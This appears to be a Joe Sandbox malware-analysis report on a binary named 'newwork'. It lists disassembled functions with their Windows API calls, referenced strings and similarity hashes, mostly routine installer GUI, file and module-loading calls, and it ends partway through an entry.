                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                • API String ID: 47109696-2530820420
                                                                                • Opcode ID: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                • Instruction ID: 212569cff1cfb7858b589fbdbabdc9c693f1f7cc945fcf11155ec0ddb5f1f406
                                                                                • Opcode Fuzzy Hash: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                • Instruction Fuzzy Hash: CC117C30704244AADB10FF65D862B5E7BF9DB45B05F618877A800E7282EB78AE05875C
                                                                                APIs
                                                                                • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ObjectSelect$Delete$Stretch
                                                                                • String ID:
                                                                                • API String ID: 1458357782-0
                                                                                • Opcode ID: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                • Instruction ID: 052e9154069abc57648b404522aaf552eddfcc6d95cd3388d63b7ef9ce004286
                                                                                • Opcode Fuzzy Hash: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                • Instruction Fuzzy Hash: 7B115C72E40619ABDB10DAD9DC86FEFB7BCEF08704F144555B614F7282C678AC418BA8
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 00495519
                                                                                  • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0049553B
                                                                                • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495AB9), ref: 0049554F
                                                                                • GetTextMetricsA.GDI32(00000000,?), ref: 00495571
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0049558E
                                                                                Strings
                                                                                • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00495546
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Text$CreateExtentFontIndirectMetricsObjectPointReleaseSelect
                                                                                • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                • API String ID: 2948443157-222967699
                                                                                • Opcode ID: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                                                • Instruction ID: fbfe8d588f566b1ae935688c8d8bbf43f3780a3d17a9f30f48774e54417b88ea
                                                                                • Opcode Fuzzy Hash: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                                                • Instruction Fuzzy Hash: 98018476A04704BFEB05DBE9CC41E5EB7EDEB48714F614476F604E7281D678AE008B28
                                                                                APIs
                                                                                • GetCursorPos.USER32 ref: 004233AF
                                                                                • WindowFromPoint.USER32(?,?), ref: 004233BC
                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233CA
                                                                                • GetCurrentThreadId.KERNEL32 ref: 004233D1
                                                                                • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233EA
                                                                                • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423401
                                                                                • SetCursor.USER32(00000000), ref: 00423413
                                                                                Similarity
                                                                                • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                • String ID:
                                                                                • API String ID: 1770779139-0
                                                                                • Opcode ID: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                • Instruction ID: 22bb490dc700fc35bbf8fe9eba0271ced42fa0644d0760cf779c582944844a3d
                                                                                • Opcode Fuzzy Hash: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                • Instruction Fuzzy Hash: BA01D4223046103AD6217B755D82E2F26E8DB85B15F50407FF504BB283DA3D9D11937D
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(user32.dll), ref: 0049533C
                                                                                • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00495349
                                                                                • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00495356
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModule
                                                                                • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                • API String ID: 667068680-2254406584
                                                                                • Opcode ID: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                                                • Instruction ID: d6622564654ba01390171a2dbbf88ec7785202fdd48675fe733a6c53722864ad
                                                                                • Opcode Fuzzy Hash: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                                                • Instruction Fuzzy Hash: 7EF0F692741F156ADA3121660C41B7F6B8CCB917B1F240137BE44A7382E9ED8C0047ED
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D691
                                                                                • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D6A1
                                                                                • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D6B1
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                • API String ID: 190572456-212574377
                                                                                • Opcode ID: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                                                • Instruction ID: 26f5c6c79611f6cc0facecefa5b4932716cc5d8e9f8ea2477ead0514974f6e87
                                                                                • Opcode Fuzzy Hash: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                                                • Instruction Fuzzy Hash: 0EF01DB0D00705DFD724EFB6ACC672736D5AB6831AF50813B990E95262D778045ACF2C
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,004812C8), ref: 0042EA35
                                                                                • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA3B
                                                                                • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA4C
                                                                                  • Part of subcall function 0042E9AC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                  • Part of subcall function 0042E9AC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                  • Part of subcall function 0042E9AC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                                • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA60
                                                                                Similarity
                                                                                • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                                • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                • API String ID: 142928637-2676053874
                                                                                • Opcode ID: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                                • Instruction ID: 20967f7a279d57b19857f2ad39d34e10c6be6de8430a8d3efc5b40b14e24a4c3
                                                                                • Opcode Fuzzy Hash: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                                • Instruction Fuzzy Hash: 99E092A1741B20EAEA10B7B67C86FAA2658EB1076DF500037F100A51F1C3BD1C80CE9E
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F089), ref: 0044C7EB
                                                                                • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7FC
                                                                                • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C80C
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                • API String ID: 2238633743-1050967733
                                                                                • Opcode ID: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                • Instruction ID: d6497c9818d993b67a5702c7731996643d684f189bbd4b702b1f6e54e13363b7
                                                                                • Opcode Fuzzy Hash: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                • Instruction Fuzzy Hash: 50F0DA70282305CAE750BBB5FDD57263694E3A470AF18277BE841551A2C7B94844CB8C
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModule
                                                                                • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                • API String ID: 667068680-222143506
                                                                                • Opcode ID: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                • Instruction ID: 32a0137ea675787c0bb1f7a77b9c903aea73f6d33f3aa717a8ad139b0a70eb03
                                                                                • Opcode Fuzzy Hash: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                • Instruction Fuzzy Hash: 4DC0C9F02C1700EEAA01B7B11DCAA7A255CC500728320843F7049BA182D97C0C104F3C
                                                                                APIs
                                                                                • GetFocus.USER32 ref: 0041B57E
                                                                                • GetDC.USER32(?), ref: 0041B58A
                                                                                • GetDeviceCaps.GDI32(?,00000068), ref: 0041B5A6
                                                                                • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5C3
                                                                                • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5DA
                                                                                • ReleaseDC.USER32(?,?), ref: 0041B626
                                                                                Similarity
                                                                                • API ID: EntriesPaletteSystem$CapsDeviceFocusRelease
                                                                                • String ID:
                                                                                • API String ID: 2502006586-0
                                                                                • Opcode ID: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                • Instruction ID: 1753bd22f5710d4f749a3cf2d8329d0f84e6490acb09e3fae29671003709e3a5
                                                                                • Opcode Fuzzy Hash: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                • Instruction Fuzzy Hash: D0410631A04258AFDF10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D51CBA5
                                                                                APIs
                                                                                • SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D184,?,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0F6
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                • API String ID: 1452528299-1580325520
                                                                                • Opcode ID: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                • Instruction ID: 81e1e27ad3ae8d1ea1d6b81b4c13ff0be47bc54c17845d393ef4ad8e2f10c1e8
                                                                                • Opcode Fuzzy Hash: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                • Instruction Fuzzy Hash: 2C117535A04608AFD731DA91C942B9EB6ADDF4470AF6040776D00572C3D67C5F0B992E
                                                                                APIs
                                                                                • GetSystemMetrics.USER32(0000000B), ref: 0041BDD5
                                                                                • GetSystemMetrics.USER32(0000000C), ref: 0041BDDF
                                                                                • GetDC.USER32(00000000), ref: 0041BDE9
                                                                                • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041BE10
                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041BE1D
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0041BE56
                                                                                Similarity
                                                                                • API ID: CapsDeviceMetricsSystem$Release
                                                                                • String ID:
                                                                                • API String ID: 447804332-0
                                                                                • Opcode ID: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                • Instruction ID: d5b995c8e3894394b735eabd433659eae54025482fea58e306a85006fdca5b97
                                                                                • Opcode Fuzzy Hash: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                • Instruction Fuzzy Hash: E5212A74E04648AFEB00EFA9C941BEEB7B4EB48714F10846AF514B7690D7785940CB69
                                                                                APIs
                                                                                • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                                • LocalFree.KERNEL32(0081E4B0,00000000,00401B68), ref: 00401ACF
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,0081E4B0,00000000,00401B68), ref: 00401AEE
                                                                                • LocalFree.KERNEL32(0081F4B0,?,00000000,00008000,0081E4B0,00000000,00401B68), ref: 00401B2D
                                                                                • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                                • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                • String ID:
                                                                                • API String ID: 3782394904-0
                                                                                • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                                • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                                APIs
                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 0047E766
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CD49), ref: 0047E78C
                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 0047E79C
                                                                                • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E7BD
                                                                                • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E7D1
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E7ED
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long$Show
                                                                                • String ID:
                                                                                • API String ID: 3609083571-0
                                                                                • Opcode ID: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                • Instruction ID: 463a5c2536fff799c7bf7cf61cbf8045bc8b98cac2b0bb45a0840e8ed8c25010
                                                                                • Opcode Fuzzy Hash: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                • Instruction Fuzzy Hash: 53010CB5641210ABEA00D769DE81F6637D8AB1C320F0943A6B959DF3E3C738EC408B49
                                                                                APIs
                                                                                  • Part of subcall function 0041A6E0: CreateBrushIndirect.GDI32 ref: 0041A74B
                                                                                • UnrealizeObject.GDI32(00000000), ref: 0041B27C
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041B28E
                                                                                • SetBkColor.GDI32(?,00000000), ref: 0041B2B1
                                                                                • SetBkMode.GDI32(?,00000002), ref: 0041B2BC
                                                                                • SetBkColor.GDI32(?,00000000), ref: 0041B2D7
                                                                                • SetBkMode.GDI32(?,00000001), ref: 0041B2E2
                                                                                  • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                • String ID:
                                                                                • API String ID: 3527656728-0
                                                                                • Opcode ID: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                • Instruction ID: d03b18a2b949c207061bd18b8e5d47ed8ce294e6be165222704fda36eef26a4f
                                                                                • Opcode Fuzzy Hash: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                • Instruction Fuzzy Hash: 56F0CD756015009BDE00FFAAD9CBE4B3B989F043097048496B908DF187CA3CD8649B3A
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateFileHandle
                                                                                • String ID: !nI$.tmp$_iu
                                                                                • API String ID: 3498533004-584216493
                                                                                • Opcode ID: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
                                                                                • Instruction ID: 7da7e9bbb2667b7856572ae533a3071efe8e017fb0344d9459fa270775feb22d
                                                                                • Opcode Fuzzy Hash: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
                                                                                • Instruction Fuzzy Hash: 1831C5B0A00249ABCB11EF95D842B9EBBB4AF44345F20453AF810B73C2D7785F058B69
                                                                                APIs
                                                                                  • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                • ShowWindow.USER32(?,00000005,00000000,00497FC1,?,?,00000000), ref: 00497D92
                                                                                  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                  • Part of subcall function 004072A8: SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                  • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                • String ID: .dat$.msg$IMsg$Uninstall
                                                                                • API String ID: 3312786188-1660910688
                                                                                • Opcode ID: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                                                • Instruction ID: abb28459e614be91aca1b68aa70fad33032f6e559e3bf784a216f74f74fa669e
                                                                                • Opcode Fuzzy Hash: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                                                • Instruction Fuzzy Hash: 89314F34A14114AFCB00EF65DD9296E7BB5EF89314F91857AF800AB395DB38BD01CB68
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EADA
                                                                                • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAE0
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB09
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                                • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                • API String ID: 828529508-2866557904
                                                                                • Opcode ID: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
                                                                                • Instruction ID: 7e091cf0cf0c4dae12ae48626bdfb721f4796128e550bb25d34418d77cfbcdd5
                                                                                • Opcode Fuzzy Hash: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
                                                                                • Instruction Fuzzy Hash: 70F0C8D034061136E620B57F5C82F7B598C8F94759F140436B109E62C2D96CA905426E
                                                                                APIs
                                                                                • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00458028
                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00458049
                                                                                • CloseHandle.KERNEL32(?,0045807C), ref: 0045806F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                • API String ID: 2573145106-3235461205
                                                                                • Opcode ID: f4b7924840392a1c056809c60f673386a353f05297e24ea8de8fb179b7d06f04
                                                                                • Instruction ID: 2f0632834368beac7d1c7250186d6a5b4d0e74160b608b18ba1b2b0c741dc3d5
                                                                                • Opcode Fuzzy Hash: f4b7924840392a1c056809c60f673386a353f05297e24ea8de8fb179b7d06f04
                                                                                • Instruction Fuzzy Hash: 8101A231600204AFD710EBA98C02A5A73A8EB49B25F51407BFC10E73D3DE399E08965D
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
